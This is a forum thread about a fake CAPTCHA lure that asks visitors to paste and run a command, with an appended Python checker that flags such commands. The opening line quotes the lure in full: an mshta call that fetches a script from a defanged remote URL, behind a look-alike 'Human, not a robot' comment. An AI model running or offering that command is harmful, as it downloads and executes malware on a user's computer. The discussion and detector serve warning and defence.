The text it wants me to run is the following:
mshta https://check/[dot]dasoc[dot]icu/gkcxv[dot]google?i=888x8x8x-x8xx-8888-xxx8-a00888888a1ab # Humаn, nоt а rоbоt: CAPTCHА Vеrіfісаtіоn ID: 552163’’
Looks like the site got hacked and wants me to run malware, but I’ve never seen something like this before.
Yeah, doesn’t mshta run JavaScript locally on Windows? This looks like a way to force you to run their script.
I hope that URL isn’t the real one, you don’t want anyone trying it just to see what would happen
https://www.virustotal.com/gui/url/d735247640472ab4a405600193afdcfd3d3757d163f52d8a5a5dfa3176df58c3/detection
Possibly.
BTW, certain malware may be able to break out of a VM.
On the other hand, some malware may recognize that it is being run in a VM and do absolutely nothing to avoid analysis.
I’m sure proper malware analysts have dedicated non-virtual machines they can just format between tests.
Now I wonder if there are motherboards with easily re-flashable firmware (from a read-only device that couldn’t be tampered with).
I have no idea how somebody might come up with this braindead, unintuitive and irreproducible mnemonic for a JavaScript interpreter but it sounds very much like something Microsoft would do.
I’m curious what the script does, I’d love to reverse engineer it but don’t want to risk accidentally executing anything. Anyone with a disposable VM care to take the risk?
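
A defensive check for the kind of pasted command quoted at the top of this thread, as an added example that is not part of any post: it inspects a clipboard string without executing it and flags mshta given a remote URL, a trailing `#` comment, and comment words that mix Latin with look-alike letters from another script. The function names, finding labels and sample string are hypothetical; the sample is constructed with a placeholder host.

```python
import re
import unicodedata

# Constructed sample modeled on the command quoted in the thread. The host is a
# placeholder and the Cyrillic look-alike letters are written as escapes.
SAMPLE = ("mshta https://example.invalid/page?i=0000 "
          "# Hum\u0430n, n\u043et \u0430 r\u043eb\u043et: CAPTCH\u0410 ID: 000000")

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def scripts_in(word):
    """Return the scripts (LATIN, CYRILLIC, ...) used by the letters in word."""
    found = set()
    for ch in word:
        if ch.isalpha():
            # Unicode names begin with the script: 'CYRILLIC SMALL LETTER A'
            found.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return found


def analyze_pasted_command(text):
    """List the lure traits present in a string copied to the clipboard."""
    # Split on a free-standing '#' so a '#fragment' inside the URL is kept.
    parts = re.split(r"\s#\s", text, maxsplit=1)
    command = parts[0]
    comment = parts[1] if len(parts) > 1 else ""
    tokens = command.split()
    # Reduce 'C:\Windows\System32\mshta.exe' to 'mshta' before comparing.
    program = re.split(r"[\\/]", tokens[0])[-1].lower() if tokens else ""
    if program.endswith(".exe"):
        program = program[:-4]
    findings = []
    if program == "mshta":
        findings.append("runs-mshta")
        if URL_RE.search(command):
            findings.append("remote-url-argument")
    if comment.strip():
        findings.append("trailing-comment")
        # A single word drawing letters from two scripts is a homoglyph tell.
        if any(len(scripts_in(w)) > 1 for w in comment.split()):
            findings.append("mixed-script-comment")
    return findings


if __name__ == "__main__":
    print(analyze_pasted_command(SAMPLE))
```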